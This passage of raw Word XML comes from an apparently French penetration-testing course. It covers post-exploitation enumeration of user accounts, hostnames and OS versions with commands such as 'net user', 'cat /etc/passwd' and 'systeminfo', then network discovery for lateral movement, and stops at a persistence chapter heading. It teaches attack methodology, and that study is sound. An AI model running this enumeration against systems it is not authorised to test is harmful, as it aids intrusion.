    </w:p>
    <w:p w14:paraId="505ED321" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2C16F60E" wp14:editId="07EA441E">
            <wp:extent cx="4681538" cy="1657333"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6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4681538" cy="1657333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4143DBE2" wp14:editId="635754A7">
            <wp:extent cx="4433888" cy="1112655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4433888" cy="1112655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D67D51" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1F926E96" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_xr2vgsppfybk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="122"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>2 - Découvrir d’autres comptes utilisateurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA92205" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="268AF621" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3C112170" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Commande sous </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “net user”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C8A2B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2857658F" wp14:editId="3BDFDF17">
            <wp:extent cx="4014788" cy="1295337"/>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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4014788" cy="1295337"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="458D9493" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6389961B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Commande sous </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> net user administrateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30506752" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="179882A4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="167E3B6B" wp14:editId="03BA24FB">
            <wp:extent cx="4291013" cy="1527600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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4291013" cy="1527600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D89CDA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="210637C8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0696AC4E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sous linux : découvrir d’autres comptes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Commande  sous</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> linux : cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D5CEC19" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="17297200" wp14:editId="2C07220C">
            <wp:extent cx="5572125" cy="3790950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6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5572125" cy="3790950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DA6B06" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6648AD41" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0D2B7BEB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_sjjuch38aoat" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="123"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">3 - L’énumération des hôtes (nom de machine) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583DB006" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5196C539" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Le nom de l’hôte d’une machine peut fournir des indices sur ses rôles fonctionnels, les noms d’hôtes incluront </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>des abréviation identifiable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> telles : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018FCE4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="79AA80DB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web pour les serveurs WEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1E3D15" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour les serveurs de bases de données</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1A1B48" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dc pour </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>les contrôleur</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de domaine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00956C08" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Convention de nommage afin de hiérarchiser la structure </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E1E55" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="58BEA242" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Commande sous </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et linux : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24639B44" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="28B1FB1B" wp14:editId="4EFAFEFE">
            <wp:extent cx="2114550" cy="42862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2114550" cy="428625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0E153B5B" wp14:editId="5F92C6CE">
            <wp:extent cx="1600200" cy="609600"/>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1600200" cy="609600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4838A7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="19B213F2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_fae6vx16keon" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="124"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">4 - L’énumération de la version et de l’architecture du système d’exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3E402" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="133F0A4E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Afin de pouvoir utiliser le bon exploit pour le noyau qui exploit la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulné</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, nous devons recueillir des informations précises sur le système de la cible </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B0330" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2E3632C3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Commande sous </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70463316" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5022C170" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1CE1C83F" wp14:editId="1CCBD295">
            <wp:extent cx="5731200" cy="2908300"/>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731200" cy="2908300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6063B5A2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6C3C00C9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sous linux : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6FF4D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AD168C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/*-release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546D013" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="525A72B9" wp14:editId="72EFFFD1">
            <wp:extent cx="5731200" cy="5334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5731200" cy="533400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A95339" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7C35E23E" wp14:editId="3A356553">
            <wp:extent cx="2362200" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="0" b="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2362200" cy="638175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2D7D0449" wp14:editId="301A23E9">
            <wp:extent cx="3162300" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3162300" cy="2419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EAA83E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3F453A00" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5DCEE5EB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_obx19p7gg1d6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="125"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 4 - Les mouvements latéraux </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655752FE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6217C651" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Les mouvements latéraux dans le système cible sont un groupe de techniques utilisées par les pentesters pour se déplacer sur le réseau tout en créant le moins d’alerte possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45200EC8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="79E3E412" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Cela permet d’avoir accès à de l’information via une autre cible. Pour cela on doit disposer d’identifiants de connexion valides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B18971" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="53F2741D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Outils de post-exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175D61FE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Des enregistreurs de frappe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7484FE80" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ingénierie social tel que l'hameçonnage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D245B4E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="66CF7AE7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sous </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : ipconfig /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAD944" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="75E06EBE" wp14:editId="3E056BB4">
            <wp:extent cx="4557713" cy="2278856"/>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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4557713" cy="2278856"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="755DEE60" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2F8ECF90" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Arp -a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BD965D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7101BBD1" wp14:editId="6A8F428D">
            <wp:extent cx="3690938" cy="1559911"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3690938" cy="1559911"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E3976" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="162F4F3E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Savoir si le firewall est activé : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> firewall show config </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFFBC2A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="00E26B68" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="14F8FE5B" wp14:editId="2F42A873">
            <wp:extent cx="4938713" cy="1772030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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4938713" cy="1772030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="093F2796" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="56DE5ED0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Net start (services lancé)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE8352E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2B4510E1" wp14:editId="13A55E0F">
            <wp:extent cx="4448175" cy="2276475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4448175" cy="2276475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="064CFF2E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="52E6368A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="64C73A20" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_nxm6a0de1fjc" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="126"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t>Chapitre 5 - La persistance</w:t>
      </w:r>
    </w:p>
